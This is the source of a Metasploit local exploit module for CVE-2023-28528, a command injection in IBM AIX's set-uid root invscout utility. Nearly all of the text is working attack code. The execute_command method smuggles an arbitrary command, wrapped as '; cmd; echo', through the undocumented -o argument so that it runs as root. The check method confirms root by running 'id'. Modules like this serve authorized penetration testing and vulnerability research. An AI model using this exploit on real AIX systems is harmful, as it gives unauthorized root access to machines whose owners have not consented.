Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  prepend Msf::Exploit::Remote::AutoCheck
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'invscout RPM Privilege Escalation',
17
        'Description' => %q{
18
          This module exploits a command injection vulnerability in IBM AIX
19
          invscout set-uid root utility present in AIX 7.2 and earlier.
20

21
          The undocumented -rpm argument can be used to install an RPM file;
22
          and the undocumented -o argument passes arguments to the rpm utility
23
          without validation, leading to command injection with effective-uid
24
          root privileges.
25

26
          This module has been tested successfully on AIX 7.2.
27
        },
28
        'Author' => [
29
          'Tim Brown', # Discovery and PoC
30
          'bcoles' # Metasploit
31
        ],
32
        'References' => [
33
          ['CVE', '2023-28528'],
34
          ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],
35
        ],
36
        'Platform' => %w[unix aix],
37
        'Arch' => ARCH_CMD,
38
        'Payload' => {
39
          'BadChars' => "\x00\x0a\x0d\x22",
40
          'Compat' => {
41
            'PayloadType' => 'cmd',
42
            'RequiredCmd' => 'generic telnet openssl'
43
          }
44
        },
45
        'DefaultOptions' => {
46
          'PrependSetresuid' => true,
47
          'PrependSetresgid' => true,
48
          'PrependFork' => true
49
        },
50
        'SessionTypes' => %w[shell meterpreter],
51
        'Targets' => [['Automatic', {}]],
52
        'DefaultTarget' => 0,
53
        'DisclosureDate' => '2023-04-24',
54
        'Notes' => {
55
          'Stability' => [CRASH_SAFE],
56
          'Reliability' => [REPEATABLE_SESSION],
57
          'SideEffects' => [IOC_IN_LOGS]
58
        }
59
      )
60
    )
61

62
    register_options([
63
      OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])
64
    ])
65
  end
66

67
  def invscout_path
68
    datastore['INVSCOUT_PATH']
69
  end
70

71
  def check
72
    return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)
73

74
    res = execute_command('id')
75
    id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s
76

77
    return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')
78

79
    CheckCode::Vulnerable("Output: #{id}")
80
  end
81

82
  def execute_command(cmd, _opts = {})
83
    rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"
84
    rpm_args = "; #{cmd}; echo "
85
    res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")
86
    vprint_line(res) unless res.blank?
87
    res
88
  end
89

90
  def exploit
91
    execute_command(payload.encoded)
92
  end
93
end
94

95